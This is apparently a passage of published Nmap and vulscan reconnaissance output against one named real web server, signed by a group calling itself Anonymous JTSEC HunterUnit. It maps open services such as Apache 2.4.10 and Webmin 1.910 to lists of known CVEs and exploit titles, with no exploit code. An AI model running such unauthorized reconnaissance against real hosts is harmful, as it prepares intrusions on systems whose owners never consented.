4612| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
4613| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
4614| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
4615|
4616| IBM X-Force - https://exchange.xforce.ibmcloud.com:
4617| [75211] Debian GNU/Linux apache 2 cross-site scripting
4618|
4619| Exploit-DB - https://www.exploit-db.com:
4620| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
4621| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
4622| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
4623| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
4624| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
4625| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
4626| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
4627| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
4628| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
4629| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
4630| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
4631| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
4632| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
4633| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
4634| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
4635| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
4636| [21719] Apache 2.0 Path Disclosure Vulnerability
4637| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
4638| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
4639| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
4640| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
4641| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
4642| [17691] Apache Struts < 2.2.0 - Remote Command Execution
4643| [15319] Apache 2.2 (Windows) Local Denial of Service
4644| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
4645| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
4646| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
4647| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
4648| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
4649| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
4650| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
4651| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
4652| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
4653| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
4654| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
4655| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
4656| [9] Apache HTTP Server 2.x Memory Leak Exploit
4657|
4658| OpenVAS (Nessus) - http://www.openvas.org:
4659| [855524] Solaris Update for Apache 2 120544-14
4660| [855077] Solaris Update for Apache 2 120543-14
4661| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
4662| [72626] Debian Security Advisory DSA 2579-1 (apache2)
4663| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
4664| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
4665| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
4666| [71256] Debian Security Advisory DSA 2452-1 (apache2)
4667| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
4668| [70724] Debian Security Advisory DSA 2405-1 (apache2)
4669| [70235] Debian Security Advisory DSA 2298-2 (apache2)
4670| [70233] Debian Security Advisory DSA 2298-1 (apache2)
4671| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
4672| [69338] Debian Security Advisory DSA 2202-1 (apache2)
4673| [65131] SLES9: Security update for Apache 2 oes/CORE
4674| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
4675| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
4676| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
4677| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
4678| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
4679| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
4680| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
4681| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
4682| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
4683| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
4684| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
4685| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
4686| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
4687| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
4688| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
4689| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
4690| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
4691| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
4692| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
4693| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
4694| [11092] Apache 2.0.39 Win32 directory traversal
4695| [66081] SLES11: Security update for Apache 2
4696| [66074] SLES10: Security update for Apache 2
4697| [66070] SLES9: Security update for Apache 2
4698| [65893] SLES10: Security update for Apache 2
4699| [65888] SLES10: Security update for Apache 2
4700| [65510] SLES9: Security update for Apache 2
4701| [65249] SLES9: Security update for Apache 2
4702| [65230] SLES9: Security update for Apache 2
4703| [65228] SLES9: Security update for Apache 2
4704| [65207] SLES9: Security update for Apache 2
4705| [65136] SLES9: Security update for Apache 2
4706| [65017] SLES9: Security update for Apache 2
4707|
4708| SecurityTracker - https://www.securitytracker.com:
4709| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
4710| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
4711| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
4712| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
4713| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
4714|
4715| OSVDB - http://www.osvdb.org:
4716| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
4717|_
4718443/tcp open ssl/http Apache httpd 2.4.10 ((Debian))
4719|_http-server-header: Apache/2.4.10 (Debian)
4720| vulners:
4721| cpe:/a:apache:http_server:2.4.10:
4722| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
4723| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
4724| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
4725| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
4726| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
4727| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
4728| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
4729| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
4730| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
4731| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
4732| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
4733| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
4734| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
4735| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
4736| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
4737| CVE-2014-3583 5.0 https://vulners.com/cve/CVE-2014-3583
4738| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
4739| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
4740| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
4741| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
4742| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
4743|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
4744| vulscan: VulDB - https://vuldb.com:
4745| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
4746| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
4747| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
4748| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
4749| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
4750| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
4751| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
4752|
4753| MITRE CVE - https://cve.mitre.org:
4754| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
4755| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
4756| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
4757| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
4758| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
4759| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
4760| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
4761| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
4762| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
4763| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
4764|
4765| SecurityFocus - https://www.securityfocus.com/bid/:
4766| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
4767| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
4768| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
4769| [15177] PHP Apache 2 Local Denial of Service Vulnerability
4770| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
4771| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
4772| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
4773| [5485] Apache 2.0 Path Disclosure Vulnerability
4774| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
4775| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
4776| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
4777| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
4778|
4779| IBM X-Force - https://exchange.xforce.ibmcloud.com:
4780| [75211] Debian GNU/Linux apache 2 cross-site scripting
4781|
4782| Exploit-DB - https://www.exploit-db.com:
4783| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
4784| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
4785| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
4786| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
4787| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
4788| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
4789| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
4790| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
4791| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
4792| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
4793| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
4794| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
4795| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
4796| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
4797| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
4798| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
4799| [21719] Apache 2.0 Path Disclosure Vulnerability
4800| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
4801| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
4802| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
4803| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
4804| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
4805| [17691] Apache Struts < 2.2.0 - Remote Command Execution
4806| [15319] Apache 2.2 (Windows) Local Denial of Service
4807| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
4808| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
4809| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
4810| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
4811| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
4812| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
4813| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
4814| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
4815| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
4816| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
4817| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
4818| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
4819| [9] Apache HTTP Server 2.x Memory Leak Exploit
4820|
4821| OpenVAS (Nessus) - http://www.openvas.org:
4822| [855524] Solaris Update for Apache 2 120544-14
4823| [855077] Solaris Update for Apache 2 120543-14
4824| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
4825| [72626] Debian Security Advisory DSA 2579-1 (apache2)
4826| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
4827| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
4828| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
4829| [71256] Debian Security Advisory DSA 2452-1 (apache2)
4830| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
4831| [70724] Debian Security Advisory DSA 2405-1 (apache2)
4832| [70235] Debian Security Advisory DSA 2298-2 (apache2)
4833| [70233] Debian Security Advisory DSA 2298-1 (apache2)
4834| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
4835| [69338] Debian Security Advisory DSA 2202-1 (apache2)
4836| [65131] SLES9: Security update for Apache 2 oes/CORE
4837| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
4838| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
4839| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
4840| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
4841| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
4842| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
4843| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
4844| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
4845| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
4846| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
4847| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
4848| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
4849| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
4850| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
4851| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
4852| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
4853| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
4854| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
4855| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
4856| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
4857| [11092] Apache 2.0.39 Win32 directory traversal
4858| [66081] SLES11: Security update for Apache 2
4859| [66074] SLES10: Security update for Apache 2
4860| [66070] SLES9: Security update for Apache 2
4861| [65893] SLES10: Security update for Apache 2
4862| [65888] SLES10: Security update for Apache 2
4863| [65510] SLES9: Security update for Apache 2
4864| [65249] SLES9: Security update for Apache 2
4865| [65230] SLES9: Security update for Apache 2
4866| [65228] SLES9: Security update for Apache 2
4867| [65207] SLES9: Security update for Apache 2
4868| [65136] SLES9: Security update for Apache 2
4869| [65017] SLES9: Security update for Apache 2
4870|
4871| SecurityTracker - https://www.securitytracker.com:
4872| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
4873| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
4874| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
4875| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
4876| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
4877|
4878| OSVDB - http://www.osvdb.org:
4879| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
4880|_
488110000/tcp open http MiniServ 1.910 (Webmin httpd)
4882|_http-server-header: MiniServ/1.910
4883| vulscan: VulDB - https://vuldb.com:
4884| No findings
4885|
4886| MITRE CVE - https://cve.mitre.org:
4887| [CVE-2005-3912] Format string vulnerability in miniserv.pl Perl web server in Webmin before 1.250 and Usermin before 1.180, with syslog logging enabled, allows remote attackers to cause a denial of service (crash or memory consumption) and possibly execute arbitrary code via format string specifiers in the username parameter to the login form, which is ultimately used in a syslog call. NOTE: the code execution might be associated with an issue in Perl.
4888| [CVE-2005-3042] miniserv.pl in Webmin before 1.230 and Usermin before 1.160, when "full PAM conversations" is enabled, allows remote attackers to bypass authentication by spoofing session IDs via certain metacharacters (line feed or carriage return).
4889| [CVE-2005-0427] The ebuild of Webmin before 1.170-r3 on Gentoo Linux includes the encrypted root password in the miniserv.users file when building a tbz2 of the webmin package, which allows remote attackers to obtain and possibly crack the encrypted password.
4890| [CVE-2003-0101] miniserv.pl in (1) Webmin before 1.070 and (2) Usermin before 1.000 does not properly handle metacharacters such as line feeds and carriage returns (CRLF) in Base-64 encoded strings during Basic authentication, which allows remote attackers to spoof a session ID and gain root privileges.
4891|
4892| SecurityFocus - https://www.securityfocus.com/bid/:
4893| No findings
4894|
4895| IBM X-Force - https://exchange.xforce.ibmcloud.com:
4896| [23277] Webmin miniserv.pl Web server component username format string
4897|
4898| Exploit-DB - https://www.exploit-db.com:
4899| No findings
4900|
4901| OpenVAS (Nessus) - http://www.openvas.org:
4902| No findings
4903|
4904| SecurityTracker - https://www.securitytracker.com:
4905| [1006161] Usermin Input Validation Flaw in 'miniserv.pl' May Let Remote Users Gain User or Root Access
4906| [1006160] Webmin Input Validation Flaw in 'miniserv.pl' May Let Remote Users Spoof Session IDs and Gain Root Access
4907|
4908| OSVDB - http://www.osvdb.org:
4909| [79044] Webmin miniserv.pl Unspecified Local Password Disclosure
4910| [21222] Webmin/Usermin miniserv.pl Format String Remote Code Execution
4911| [19575] Webmin/Usermin miniserv.pl Metacharacter PAM Authentication Bypass
4912| [13772] Gentoo Webmin miniserv.users Encrypted Root Password Remote Disclosure
4913| [10803] Webmin/Usermin miniserv.pl Base-64 String Metacharacter Handling Session Spoofing
4914| [1844] Webmin miniserv.pl Environment Variable Cleartext Password Local Disclosure
4915|_
4916Aggressive OS guesses: Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (94%), Linux 2.6.39 (93%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (93%), OpenWrt White Russian 0.9 (Linux 2.4.30) (93%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.9 (92%)
4917No exact OS matches for host (test conditions non-ideal).
4918Uptime guess: 46.247 days (since Fri Sep 6 00:04:21 2019)
4919Network Distance: 7 hops
4920TCP Sequence Prediction: Difficulty=259 (Good luck!)
4921IP ID Sequence Generation: All zeros
4922Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
4923
4924TRACEROUTE (using port 3306/tcp)
4925HOP RTT ADDRESS
49261 269.64 ms 10.247.204.1
49272 269.73 ms 45.131.5.2
49283 269.70 ms 109.236.95.228
49294 269.73 ms 109.236.95.179
49305 170.11 ms 190.2.158.153
49316 170.11 ms 185.106.120.66
49327 170.09 ms latina.petite.guru (185.82.200.52)
4933
4934NSE: Script Post-scanning.
4935Initiating NSE at 06:00
4936Completed NSE at 06:00, 0.00s elapsed
4937Initiating NSE at 06:00
4938Completed NSE at 06:00, 0.00s elapsed
4939#######################################################################################################################################
4940Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-22 06:00 EDT
4941NSE: Loaded 47 scripts for scanning.
4942NSE: Script Pre-scanning.
4943Initiating NSE at 06:00
4944Completed NSE at 06:00, 0.00s elapsed
4945Initiating NSE at 06:00
4946Completed NSE at 06:00, 0.00s elapsed
4947Initiating Parallel DNS resolution of 1 host. at 06:00
4948Completed Parallel DNS resolution of 1 host. at 06:00, 0.02s elapsed
4949Initiating UDP Scan at 06:00
4950Scanning latina.petite.guru (185.82.200.52) [15 ports]
4951Increasing send delay for 185.82.200.52 from 0 to 50 due to max_successful_tryno increase to 4
4952Completed UDP Scan at 06:00, 7.32s elapsed (15 total ports)
4953Initiating Service scan at 06:00
4954Initiating OS detection (try #1) against latina.petite.guru (185.82.200.52)
4955Retrying OS detection (try #2) against latina.petite.guru (185.82.200.52)
4956Initiating Traceroute at 06:00
4957Completed Traceroute at 06:00, 7.23s elapsed
4958Initiating Parallel DNS resolution of 1 host. at 06:00
4959Completed Parallel DNS resolution of 1 host. at 06:00, 0.00s elapsed
4960NSE: Script scanning 185.82.200.52.
4961Initiating NSE at 06:00
4962Completed NSE at 06:00, 0.00s elapsed
4963Initiating NSE at 06:00
4964Completed NSE at 06:00, 0.00s elapsed
4965Nmap scan report for latina.petite.guru (185.82.200.52)
4966Host is up (0.20s latency).
4967
4968PORT STATE SERVICE VERSION
496953/udp closed domain
497067/udp closed dhcps
497168/udp closed dhcpc
497269/udp closed tftp
497388/udp closed kerberos-sec
4974123/udp closed ntp
4975137/udp filtered netbios-ns
4976138/udp filtered netbios-dgm
4977139/udp closed netbios-ssn
4978161/udp closed snmp
4979162/udp closed snmptrap
4980389/udp closed ldap
4981500/udp closed isakmp
4982520/udp closed route
49832049/udp closed nfs
4984Too many fingerprints match this host to give specific OS details
4985Network Distance: 7 hops
4986
4987TRACEROUTE (using port 137/udp)
4988HOP RTT ADDRESS
49891 115.59 ms 10.247.204.1
49902 102.86 ms 10.247.204.1
49913 102.85 ms 10.247.204.1
49924 102.85 ms 10.247.204.1
49935 102.85 ms 10.247.204.1
49946 102.83 ms 10.247.204.1
49957 102.52 ms 10.247.204.1
49968 ... 9
499710 212.49 ms 10.247.204.1
499811 ... 18
499919 208.45 ms 10.247.204.1
500020 112.43 ms 10.247.204.1
500121 208.93 ms 10.247.204.1
500222 ... 29
500330 172.98 ms 10.247.204.1
5004
5005NSE: Script Post-scanning.
5006Initiating NSE at 06:00
5007Completed NSE at 06:00, 0.00s elapsed
5008Initiating NSE at 06:00
5009Completed NSE at 06:00, 0.00s elapsed
5010#######################################################################################################################################
5011Hosts
5012=====
5013
5014address mac name os_name os_flavor os_sp purpose info comments
5015------- --- ---- ------- --------- ----- ------- ---- --------
5016185.82.200.52 latina.petite.guru Linux server
5017
5018Services
5019========
5020
5021host port proto name state info
5022---- ---- ----- ---- ----- ----
5023185.82.200.52 22 tcp ssh open OpenSSH 6.7p1 Debian 5+deb8u8 protocol 2.0
5024185.82.200.52 53 udp domain closed
5025185.82.200.52 67 udp dhcps closed
5026185.82.200.52 68 udp dhcpc closed
5027185.82.200.52 69 udp tftp closed
5028185.82.200.52 80 tcp http open Apache httpd 2.4.10 (Debian)
5029185.82.200.52 88 udp kerberos-sec closed
5030185.82.200.52 123 udp ntp closed
5031185.82.200.52 137 udp netbios-ns filtered
5032185.82.200.52 138 udp netbios-dgm filtered
5033185.82.200.52 139 udp netbios-ssn closed
5034185.82.200.52 161 udp snmp closed
5035185.82.200.52 162 udp snmptrap closed
5036185.82.200.52 389 udp ldap closed
5037185.82.200.52 443 tcp ssl/http open Apache httpd 2.4.10 (Debian)
5038185.82.200.52 500 udp isakmp closed
5039185.82.200.52 520 udp route closed
5040185.82.200.52 2049 udp nfs closed
5041185.82.200.52 10000 tcp http open MiniServ 1.910 Webmin httpd
5042#######################################################################################################################################
5043 Anonymous JTSEC HunterUnit Full Recon #3